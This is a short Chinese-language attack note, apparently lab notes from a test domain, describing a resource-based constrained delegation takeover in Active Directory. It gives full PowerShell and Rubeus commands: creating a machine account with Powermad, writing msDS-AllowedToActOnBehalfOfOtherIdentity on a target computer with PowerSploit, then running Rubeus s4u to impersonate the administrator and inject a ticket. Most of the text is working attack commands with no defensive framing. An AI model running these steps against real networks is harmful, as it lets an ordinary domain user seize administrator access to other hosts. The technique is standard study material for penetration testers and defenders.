https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

    https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-genericwrite-write-on-computer

    • 原理
      普通域用户默认可以创建最多10个新的计算机账户
      不需要域管理员权限去设置基于资源的约束委派(Resource-based constrained delegation)相关属性
      普通域用户可以设置资源约束委派相关属性
    • 条件
      一个普通域用户权限
      域控为Server 2012及以上版本
      对目标主机拥有写权限
    • 操作

    测试环境是在一台域计算机上登录的普通域用户
    创建一个名为testpc的计算机账户,并获取testpc的SID

    1. import-module .\Powermad.ps1
    2. New-MachineAccount -MachineAccount testpc -Password $(ConvertTo-SecureString "Admin123" -AsPlainText -Force)
    3. dsquery.exe * -filter "(&(sAMAccountName=testpc$))" -limit 0 -attr *
    4. 这里获取到的为 S-1-5-21-4030334565-2237076002-3168552227-1603

    配置基于资源的约束委派属性

    1. import-module .\Microsoft.ActiveDirectory.Management.dll
    2. $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-4030334565-2237076002-3168552227-1603)"
    3. $SDBytes = New-Object byte[] ($SD.BinaryLength)
    4. $SD.GetBinaryForm($SDBytes, 0)
    5. Import-Module .\PowerSploit-master\PowerSploit.psm1
    6. Get-DomainComputer WIN-JSGIJOFK3T7 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
    7. Get-DomainComputer WIN-JSGIJOFK3T7 -Properties msds-allowedtoactonbehalfofotheridentity

    配置完msDS-AllowedToActOnBehalfOfOtherIdentity属性之后就可以通过基于资源的约束委派去攻击目标主机了

    1. 将密码转换为hash
    2. Rubeus.exe hash /user:testpc /password:Admin123 /domain:ddh.com
    3. 然后用testpc$hash请求白银票据并导入到当前会话中
    4. Rubeus.exe s4u /user:testpc$ /rc4:E45A314C664D40A227F9540121D1A29D /impersonateuser:administrator /msdsspn:cifs/dm2008 /ptt